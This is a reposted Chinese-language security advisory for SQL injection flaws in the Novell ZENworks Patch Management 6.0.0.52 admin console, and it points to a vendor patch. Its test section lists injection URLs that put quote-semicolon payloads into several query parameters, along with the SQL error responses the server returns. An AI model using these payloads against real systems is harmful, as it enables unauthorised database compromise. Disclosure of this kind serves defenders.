歡迎來到Linux教程網
Linux教程網
Linux教程網
Linux教程網
您现在的位置: Linux教程網 >> UnixLinux >  >> Linux綜合 >> Linux資訊 >> Linux業界

Novell ZENworks補丁管理SQL注入漏洞

受影響系統:

Novell ZENworks Patch Managemen 6.0.0.52

不受影響系統:

Novell ZENworks Patch Managemen 6.2

描述:

BUGTRAQ ID: 15220

Novell的ZENworks組件允許組織從SuSE Linux平台管理Windows工作站,Patch Management是其中用於管理補丁的組件。ZENworks Patch Management的管理控制台中存在多個SQL注入漏洞,遠程攻擊者可以完全入侵基礎數據庫系統。但如果要利用這個漏洞,管理員應至少手動創建了一個非特權用戶帳號。

測試方法:

【警告:以下程序(方法)可能帶有攻擊性,僅供安全研究與教學之用。使用者風險自負!】

http://192.168.1.10/computers/default.asp?sort=&Direction='; Response from server: Incorrect syntax near ', @RecsPerPage=100, @FirstRec=0, @Action=0, @Search = ', @groupFilter = '. http://192.168.1.10/reports/default.asp?sort=[ReportImpact_Name] &Dir=asc&SearchText=';StatusFilter=ERRR&computerFilter=187&impactFilter=29&saveFilter=save &Page=rep Response from server: Incorrecy syntax near ', @delimiter='. http://192.168.1.10/reports/default.asp?sort=[ReportImpact_Name] &Dir=asc&SearchText=CIRT.DK&StatusFilter=';&computerFilter=187&impactFilter=29&saveFilter= save&Page=rep Response from server: Incorrect syntax near ', @groupFilter = ', @ImpactFilter = '. http://192.168.1.10/reports/default.asp?sort=[ReportImpact_Name] &Dir=asc&SearchText=CIRT.DK&StatusFilter=ERRR&computerFilter=';&impactFilter=29&saveFilter =save&Page=rep Response from server: Line 1: Incorrect syntax near ', @Contact_ID='.

建議:

廠商補丁:

Novell

目前廠商已經發布了升級補丁以修復這個安全問題,請到廠商的主頁下載:

(t003)

 

來源:黑客基地




Copyright © Linux教程網 All Rights Reserved